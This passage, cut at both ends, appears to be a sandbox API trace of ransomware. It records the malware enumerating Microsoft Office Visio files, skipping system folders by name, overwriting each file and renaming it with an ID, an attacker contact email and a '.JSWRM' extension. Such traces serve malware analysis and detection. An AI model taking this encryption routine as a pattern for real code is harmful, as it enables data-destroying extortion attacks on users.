(in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=55812) returned 1 [0144.076] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0144.077] ReadFile (in: hFile=0x314, lpBuffer=0x27b348, nNumberOfBytesToRead=0xda00, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e534*=0xda00, lpOverlapped=0x0) returned 1 [0144.082] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0144.082] WriteFile (in: hFile=0x314, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0xda00, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e530*=0xda00, lpOverlapped=0x0) returned 1 [0144.082] CloseHandle (hObject=0x314) returned 1 [0144.083] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\ALARM_U.VSSX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\alarm_u.vssx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\ALARM_U.VSSX.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\alarm_u.vssx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0144.084] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x16b6b75, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x16b6b75, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x16dce02, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x1948d, dwReserved0=0x60002, dwReserved1=0x210d24, cFileName="ANNOT_M.VSSX", cAlternateFileName="ANNOT_~1.VSS")) returned 1 [0144.084] lstrcmpiW (lpString1="ANNOT_M.VSSX", lpString2=".") returned 1 [0144.084] lstrcmpiW (lpString1="ANNOT_M.VSSX", lpString2="..") returned 1 [0144.084] lstrcmpiW (lpString1="ANNOT_M.VSSX", lpString2="...") returned 1 [0144.084] lstrcmpiW (lpString1="ANNOT_M.VSSX", lpString2="windows") returned -1 [0144.084] lstrcmpiW (lpString1="ANNOT_M.VSSX", lpString2="recovery") returned -1 [0144.084] lstrcmpiW (lpString1="ANNOT_M.VSSX", lpString2="perflogs") returned -1 [0144.084] lstrcmpiW (lpString1="ANNOT_M.VSSX", lpString2="documents and settings") returned -1 [0144.084] lstrcmpiW (lpString1="ANNOT_M.VSSX", lpString2="$RECYCLE.BIN") returned 1 [0144.084] lstrcmpiW (lpString1="ANNOT_M.VSSX", lpString2="system volume information") returned -1 [0144.084] lstrcmpiW (lpString1="ANNOT_M.VSSX", lpString2="msocache") returned -1 [0144.084] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ANNOT_M.VSSX", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0144.084] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ANNOT_M.VSSX", cchWideChar=12, lpMultiByteStr=0x345e870, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ANNOT_M.VSSX", lpUsedDefaultChar=0x0) returned 12 [0144.084] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ANNOT_M.VSSX", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0144.084] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ANNOT_M.VSSX", cchWideChar=12, lpMultiByteStr=0x345e840, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ANNOT_M.VSSX", lpUsedDefaultChar=0x0) returned 12 [0144.084] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0144.084] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0144.084] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\ANNOT_M.VSSX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\annot_m.vssx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0144.086] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=103565) returned 1 [0144.086] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0144.087] ReadFile (in: hFile=0x314, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x19480, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e534*=0x19480, lpOverlapped=0x0) returned 1 [0144.143] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0144.143] WriteFile (in: hFile=0x314, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x19480, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e530*=0x19480, lpOverlapped=0x0) returned 1 [0144.144] CloseHandle (hObject=0x314) returned 1 [0144.144] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\ANNOT_M.VSSX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\annot_m.vssx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\ANNOT_M.VSSX.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\annot_m.vssx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0144.150] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1f3541d, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x1f3541d, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x1f3541d, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x17322, dwReserved0=0x60002, dwReserved1=0x210d24, cFileName="ANNOT_U.VSSX", cAlternateFileName="ANNOT_~2.VSS")) returned 1 [0144.150] lstrcmpiW (lpString1="ANNOT_U.VSSX", lpString2=".") returned 1 [0144.150] lstrcmpiW (lpString1="ANNOT_U.VSSX", lpString2="..") returned 1 [0144.150] lstrcmpiW (lpString1="ANNOT_U.VSSX", lpString2="...") returned 1 [0144.150] lstrcmpiW (lpString1="ANNOT_U.VSSX", lpString2="windows") returned -1 [0144.150] lstrcmpiW (lpString1="ANNOT_U.VSSX", lpString2="recovery") returned -1 [0144.150] lstrcmpiW (lpString1="ANNOT_U.VSSX", lpString2="perflogs") returned -1 [0144.150] lstrcmpiW (lpString1="ANNOT_U.VSSX", lpString2="documents and settings") returned -1 [0144.150] lstrcmpiW (lpString1="ANNOT_U.VSSX", lpString2="$RECYCLE.BIN") returned 1 [0144.150] lstrcmpiW (lpString1="ANNOT_U.VSSX", lpString2="system volume information") returned -1 [0144.150] lstrcmpiW (lpString1="ANNOT_U.VSSX", lpString2="msocache") returned -1 [0144.151] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ANNOT_U.VSSX", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0144.151] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ANNOT_U.VSSX", cchWideChar=12, lpMultiByteStr=0x345e870, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ANNOT_U.VSSX", lpUsedDefaultChar=0x0) returned 12 [0144.151] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ANNOT_U.VSSX", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0144.151] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ANNOT_U.VSSX", cchWideChar=12, lpMultiByteStr=0x345e840, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ANNOT_U.VSSX", lpUsedDefaultChar=0x0) returned 12 [0144.151] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0144.151] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0144.151] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\ANNOT_U.VSSX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\annot_u.vssx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0144.205] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=95010) returned 1 [0144.205] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0144.205] ReadFile (in: hFile=0x314, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x17320, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e534*=0x17320, lpOverlapped=0x0) returned 1 [0144.213] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0144.213] WriteFile (in: hFile=0x314, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x17320, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e530*=0x17320, lpOverlapped=0x0) returned 1 [0144.214] CloseHandle (hObject=0x314) returned 1 [0144.214] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\ANNOT_U.VSSX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\annot_u.vssx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\ANNOT_U.VSSX.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\annot_u.vssx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0144.216] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x383ddaf, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x383ddaf, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x383ddaf, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x2fdc2, dwReserved0=0x60002, dwReserved1=0x210d24, cFileName="APPL_M.VSSX", cAlternateFileName="APPL_M~1.VSS")) returned 1 [0144.216] lstrcmpiW (lpString1="APPL_M.VSSX", lpString2=".") returned 1 [0144.216] lstrcmpiW (lpString1="APPL_M.VSSX", lpString2="..") returned 1 [0144.216] lstrcmpiW (lpString1="APPL_M.VSSX", lpString2="...") returned 1 [0144.216] lstrcmpiW (lpString1="APPL_M.VSSX", lpString2="windows") returned -1 [0144.216] lstrcmpiW (lpString1="APPL_M.VSSX", lpString2="recovery") returned -1 [0144.216] lstrcmpiW (lpString1="APPL_M.VSSX", lpString2="perflogs") returned -1 [0144.216] lstrcmpiW (lpString1="APPL_M.VSSX", lpString2="documents and settings") returned -1 [0144.216] lstrcmpiW (lpString1="APPL_M.VSSX", lpString2="$RECYCLE.BIN") returned 1 [0144.216] lstrcmpiW (lpString1="APPL_M.VSSX", lpString2="system volume information") returned -1 [0144.216] lstrcmpiW (lpString1="APPL_M.VSSX", lpString2="msocache") returned -1 [0144.216] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="APPL_M.VSSX", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0144.216] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="APPL_M.VSSX", cchWideChar=11, lpMultiByteStr=0x345e870, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="APPL_M.VSSX", lpUsedDefaultChar=0x0) returned 11 [0144.216] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="APPL_M.VSSX", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0144.216] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="APPL_M.VSSX", cchWideChar=11, lpMultiByteStr=0x345e840, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="APPL_M.VSSX", lpUsedDefaultChar=0x0) returned 11 [0144.216] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0144.216] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0144.216] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\APPL_M.VSSX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\appl_m.vssx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0144.218] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=196034) returned 1 [0144.218] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0144.218] ReadFile (in: hFile=0x314, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e534*=0x27100, lpOverlapped=0x0) returned 1 [0144.230] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0144.230] WriteFile (in: hFile=0x314, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e530*=0x27100, lpOverlapped=0x0) returned 1 [0144.231] CloseHandle (hObject=0x314) returned 1 [0144.231] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\APPL_M.VSSX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\appl_m.vssx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\APPL_M.VSSX.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\appl_m.vssx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0144.232] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1a96a42, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x1a96a42, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x1abcabc, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x2f4d7, dwReserved0=0x60002, dwReserved1=0x210d24, cFileName="APPL_U.VSSX", cAlternateFileName="APPL_U~1.VSS")) returned 1 [0144.232] lstrcmpiW (lpString1="APPL_U.VSSX", lpString2=".") returned 1 [0144.232] lstrcmpiW (lpString1="APPL_U.VSSX", lpString2="..") returned 1 [0144.232] lstrcmpiW (lpString1="APPL_U.VSSX", lpString2="...") returned 1 [0144.232] lstrcmpiW (lpString1="APPL_U.VSSX", lpString2="windows") returned -1 [0144.232] lstrcmpiW (lpString1="APPL_U.VSSX", lpString2="recovery") returned -1 [0144.232] lstrcmpiW (lpString1="APPL_U.VSSX", lpString2="perflogs") returned -1 [0144.232] lstrcmpiW (lpString1="APPL_U.VSSX", lpString2="documents and settings") returned -1 [0144.232] lstrcmpiW (lpString1="APPL_U.VSSX", lpString2="$RECYCLE.BIN") returned 1 [0144.232] lstrcmpiW (lpString1="APPL_U.VSSX", lpString2="system volume information") returned -1 [0144.232] lstrcmpiW (lpString1="APPL_U.VSSX", lpString2="msocache") returned -1 [0144.232] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="APPL_U.VSSX", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0144.232] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="APPL_U.VSSX", cchWideChar=11, lpMultiByteStr=0x345e870, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="APPL_U.VSSX", lpUsedDefaultChar=0x0) returned 11 [0144.232] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="APPL_U.VSSX", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0144.232] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="APPL_U.VSSX", cchWideChar=11, lpMultiByteStr=0x345e840, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="APPL_U.VSSX", lpUsedDefaultChar=0x0) returned 11 [0144.232] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0144.233] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0144.233] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\APPL_U.VSSX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\appl_u.vssx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0144.235] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=193751) returned 1 [0144.235] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0144.235] ReadFile (in: hFile=0x314, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e534*=0x27100, lpOverlapped=0x0) returned 1 [0144.248] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0144.248] WriteFile (in: hFile=0x314, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e530*=0x27100, lpOverlapped=0x0) returned 1 [0144.249] CloseHandle (hObject=0x314) returned 1 [0144.249] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\APPL_U.VSSX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\appl_u.vssx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\APPL_U.VSSX.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\appl_u.vssx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0144.250] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x2f00af3, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x2f00af3, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x2f00af3, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x150d8, dwReserved0=0x60002, dwReserved1=0x210d24, cFileName="APPL_VISIO2013_M.VSSX", cAlternateFileName="APPL_V~2.VSS")) returned 1 [0144.250] lstrcmpiW (lpString1="APPL_VISIO2013_M.VSSX", lpString2=".") returned 1 [0144.250] lstrcmpiW (lpString1="APPL_VISIO2013_M.VSSX", lpString2="..") returned 1 [0144.250] lstrcmpiW (lpString1="APPL_VISIO2013_M.VSSX", lpString2="...") returned 1 [0144.250] lstrcmpiW (lpString1="APPL_VISIO2013_M.VSSX", lpString2="windows") returned -1 [0144.250] lstrcmpiW (lpString1="APPL_VISIO2013_M.VSSX", lpString2="recovery") returned -1 [0144.250] lstrcmpiW (lpString1="APPL_VISIO2013_M.VSSX", lpString2="perflogs") returned -1 [0144.250] lstrcmpiW (lpString1="APPL_VISIO2013_M.VSSX", lpString2="documents and settings") returned -1 [0144.250] lstrcmpiW (lpString1="APPL_VISIO2013_M.VSSX", lpString2="$RECYCLE.BIN") returned 1 [0144.250] lstrcmpiW (lpString1="APPL_VISIO2013_M.VSSX", lpString2="system volume information") returned -1 [0144.251] lstrcmpiW (lpString1="APPL_VISIO2013_M.VSSX", lpString2="msocache") returned -1 [0144.251] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="APPL_VISIO2013_M.VSSX", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0144.251] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="APPL_VISIO2013_M.VSSX", cchWideChar=21, lpMultiByteStr=0x2410d8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="APPL_VISIO2013_M.VSSX", lpUsedDefaultChar=0x0) returned 21 [0144.251] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="APPL_VISIO2013_M.VSSX", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0144.251] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="APPL_VISIO2013_M.VSSX", cchWideChar=21, lpMultiByteStr=0x241100, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="APPL_VISIO2013_M.VSSX", lpUsedDefaultChar=0x0) returned 21 [0144.251] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0144.251] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0144.251] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\APPL_VISIO2013_M.VSSX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\appl_visio2013_m.vssx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0144.252] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=86232) returned 1 [0144.252] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0144.252] ReadFile (in: hFile=0x314, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x150d0, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e534*=0x150d0, lpOverlapped=0x0) returned 1 [0144.258] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0144.259] WriteFile (in: hFile=0x314, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x150d0, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e530*=0x150d0, lpOverlapped=0x0) returned 1 [0144.259] CloseHandle (hObject=0x314) returned 1 [0144.260] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\APPL_VISIO2013_M.VSSX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio 